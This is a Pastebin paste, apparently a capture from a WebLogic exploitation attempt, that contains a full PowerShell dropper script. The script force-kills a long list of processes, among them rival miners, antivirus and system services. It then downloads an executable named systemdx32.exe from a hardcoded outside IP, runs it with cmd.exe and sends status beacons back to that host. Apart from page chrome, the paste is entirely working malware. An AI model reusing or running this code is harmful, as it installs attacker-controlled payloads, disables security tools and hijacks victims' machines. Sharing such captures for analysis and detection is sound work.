Advertisement
thlnk3r

wls_vuln_attempt_191.101.180.84

Jan 10th, 2018
810
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.24 KB | None | 0 0
  1. $counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
  2. $malwares = "alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
  3. $malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
  4. foreach ($counter in $counters) {
  5. if ($counter.CookedValue -ge 50) {
  6. if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
  7. continue
  8. }
  9. foreach ($malware in $malwares) {
  10. if ($counter.InstanceName -eq $malware) {
  11. Stop-Process -processname $counter.InstanceName -Force
  12. }
  13. }
  14. }
  15. foreach ($malware2 in $malwares2) {
  16. if ($counter.InstanceName -eq $malware2) {
  17. Stop-Process -processname $counter.InstanceName -Force
  18. }
  19. }
  20. }
  21.  
  22. $SELF_COPY = "$HOME\readme.txt"
  23. $HSST = "http://191.101.180.84"
  24. $CALLBACK = $HSST
  25.  
  26. $DEFAULT_RFILE = "$HSST/files/w/default"
  27. $OTHERS_RFILE = "$HSST/files/w/others"
  28.  
  29. $LFILE_NAME = "systemdx32.exe"
  30. # $LFILE_PATH = "$env:TMP\$LFILE_NAME"
  31. # $LFILE_PATH = "$HOME\$LFILE_NAME"
  32. $LFILE_PATH = "$LFILE_NAME"
  33.  
  34. $DOWNLOADER = New-Object System.Net.WebClient
  35. $SYSTEM_BIT = [System.IntPtr]::Size
  36. if ( $SYSTEM_BIT -eq 8 ) {
  37. $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
  38. } else {
  39. $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
  40. }
  41. if ( !(Get-Process systemdx32 -ErrorAction SilentlyContinue) ) {
  42. $DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
  43. cmd.exe /c $LFILE_PATH
  44. } else {
  45. $DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
  46. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement